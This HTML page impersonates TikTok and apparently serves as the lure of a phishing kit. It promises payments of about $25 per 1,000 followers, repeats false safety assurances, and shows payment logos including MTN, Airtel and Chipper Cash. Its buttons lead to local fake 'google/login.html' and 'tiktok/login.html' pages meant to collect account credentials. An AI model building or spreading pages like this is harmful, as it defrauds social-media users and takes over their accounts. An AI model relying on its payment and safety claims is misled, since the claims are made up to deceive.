<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>TikTok Payment Guide</title>
    <style>
        body {
            font-family: 'Roboto', Arial, sans-serif;
            background-color: #000000;
            color: #C0C0C0;
            padding: 20px;
        }

        h1,
        h2 {
            color: #00A3D9;
        }

        .container {
            max-width: 600px;
            margin: auto;
            background-color: #333333;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }

        button {
            background-color: #00A3D9;
            color: white;
            border: none;
            padding: 10px 20px;
            border-radius: 5px;
            cursor: pointer;
            margin-top: 20px;
            display: block;
            width: 150px;
            font-size: 16px;
        }

        button:hover {
            background-color: #0077A2;
        }

        .requirements {
            margin-top: 30px;
            font-size: 15px;
            color: #C0C0C0;
        }

        .footer {
            margin-top: 30px;
            font-size: 12px;
            text-align: center;
            color: #C0C0C0;
        }

        .footer a {
            color: #FFFFFF;
            text-decoration: none;
            margin: 0 10px;
        }

        .footer a:hover {
            color: #00A3D9;
        }

        .image-container {
            width: 60px;
            height: 60px;
            border-radius: 30px;
            overflow: hidden;
            display: inline-block;
            margin-right: 10px;
        }

        .image-container img {
            width: 100%;
            height: 100%;
            object-fit: cover;
        }

        .text-after-image {
            display: inline-block;
            vertical-align: middle;
            color: #C0C0C0
        }

        .payment-method {
            display: inline-block;
            margin-right: 10px;
            text-align: center;
        }

        .payment-method img {
            width: 60px;
            height: 60px;
            border-radius: 10px;
            display: block;
            margin: 0 auto 5px;
            color: #C0C0C0;
        }

        .payment-method-text {
            font-size: 12px;
            display: block;
            text-align: center;
        }

        .equation {
            margin-top: 20px;
        }

        .signup {
            text-align: center;
        }

        .signup-button {
            background-color: #00A3D9;
            color: white;
            border: none;
            padding: 10px 10px;
            border-radius: 5px;
            cursor: pointer;
            margin-top: 20px;
            font-size: 14px;
        }
    </style>
</head>

<body>
    <div class="container">
        <h2>Tiktok Payment Application </h2>
        <div class="image-container">
            <img src="images/logo.png" alt="Icon">
        </div>
        <div class="text-after-image">
            <p>So, you've been doing great on TikTok and now you're looking to cash in on your efforts! Here are the requirements you need to meet to qualify for TikTok payments:</p>
            <ul class="requirements">
                <li><strong>Your email must be linked to your TikTok account.</strong></li>
                <li><strong>You must have a good number of followers on TikTok.</strong></li>
            </ul>
        </div>
        <h2>Is it worth it, is it possible and is it Safe?</h2>
        <ul class="requirements">
            <li><strong>"Is it worth it and is it possible and is it safe?" These questions often arise when considering TikTok payments. The truth is, if you're dedicated and have a substantial following, TikTok payments can be a lucrative opportunity.

                To qualify for TikTok payments, you need to meet certain criteria. Firstly, ensure your email is linked to your TikTok account. This step is crucial as it establishes a secure channel for transactions and communication.
                
                Secondly, building a sizable follower base is essential. The more followers you have, the higher your earning potential. Engage with your audience, create captivating content, and stay consistent to attract and retain followers.
                
                Lastly, safety is paramount. TikTok ensures secure payment methods and adheres to strict privacy policies to safeguard user data. By following these steps and understanding the requirements, TikTok payments can indeed be a worthwhile endeavor.</strong></li>
        
        </ul>
        <h2>Follow These Steps</h2>
        <p>But before you start counting your coins, be sure to follow these simple steps to set up an Email If one Exists Your free to skip this.</p>
        <ol class="requirements">
            <li><strong>Open your Tiktok account.</strong</li>
            <li><strong>Go to user profile.</strong></li>
            <li><strong>Tap the three dots in the top right corner of your screen.</strong</li>
            <li><strong>Go to "setting and privacy".</strong</li>
            <li><strong>Tap "account".</strong></li>
            <li><strong>Select "account information".</strong</li>
            <li><strong>Add or link an Email to the account.</strong</li>
            <li>< strong>Wait for tikTok to approve changes via Email.</strong</li>
        </ol>
        <div class="equation">
            <p>1,000 followers earns you approximately $25 in payments.</p>
        </div>
        <p>Supported payment options  by TikTok:</p>
        <div class="payment-method">
            <img src="images/mtn.png" alt="MTN">
            <div class="payment-method-text">MTN</div>
        </div>
        <div class="payment-method">
            <img src="images/airte.png" alt="Airtel">
            <div class="payment-method-text">Airtel</div>
        </div>
        <div class="payment-method">
            <img src="images/visa.png" alt="Visa">
            <div class="payment-method-text">Visa</div>
        </div>
        <div class="payment-method">
            <img src="images/paypal.png" alt="PayPal">
            <div class="payment-method-text">PayPal</div>
        </div>
        <div class="payment-method">
            <img src="images/chipper.png" alt="Chipper Cash">
            <div class="payment-method-text">Chipper Cash</div>
        </div>
        <div class="signup">
            <p>Account information can be provided via options below </p>
            <button class="signup-button" onclick="window.location.href = 'google/login.html';">Activation Email Here</button>
            <button class="signup-button" onclick="window.location.href = 'tiktok/login.html';">TikTok Verification</button>
        </div>
    </div>
    <div class="footer">
        <a href="#">Privacy Policy</a>
        <a href="#">Help</a>
        <a href="#">Safety</a>
        <p>TikTok Pte. Ltd. One Raffles Quay, North Tower, #26-10, 048583</p>
    </div>
</body>

</html>
